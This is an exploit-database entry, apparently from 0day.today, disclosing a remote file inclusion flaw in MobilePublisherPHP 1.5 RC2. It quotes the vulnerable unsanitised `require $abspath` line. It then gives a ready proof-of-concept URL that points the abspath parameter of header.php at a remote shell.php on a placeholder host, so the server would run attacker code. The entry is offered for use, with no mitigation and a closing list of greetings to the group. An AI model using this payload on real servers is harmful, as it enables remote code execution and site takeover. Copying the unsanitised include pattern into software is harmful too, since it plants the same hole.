MobilePublisherPHP <= 1.5 RC2 Remote File Include Vulnerability

2006-09-17T00:00:00
ID 1337DAY-ID-848
Type zdt
Reporter Timq
Modified 2006-09-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
MobilePublisherPHP <= 1.5 RC2 Remote File Include Vulnerability
===============================================================


MobilePublisherPHP 1.5 RC2 (functions.php)Remote Include Vulnerability

##################################################################

Discovered by: Timq
http://www.securitydb.org

Team-Rootshell
##################################################################

http://www.securitydb.org

Team-Rootshell
##################################################################

Vulnerable: require $abspath."/functions.php";

###################################################################

Exploit PoC:

http://site.com/[dir]/header.php?abspath=http://site.com/shell.php?


####################################################################

Shoutz: Warpboy,Z66,Gammarays,Archangel,Cm2,Splinter,InTel,Preddy,Ice,ErazerZ,Maggot
PunKerX,Pepin,Ender


#####################################################################


#  0day.today [2018-01-04]  #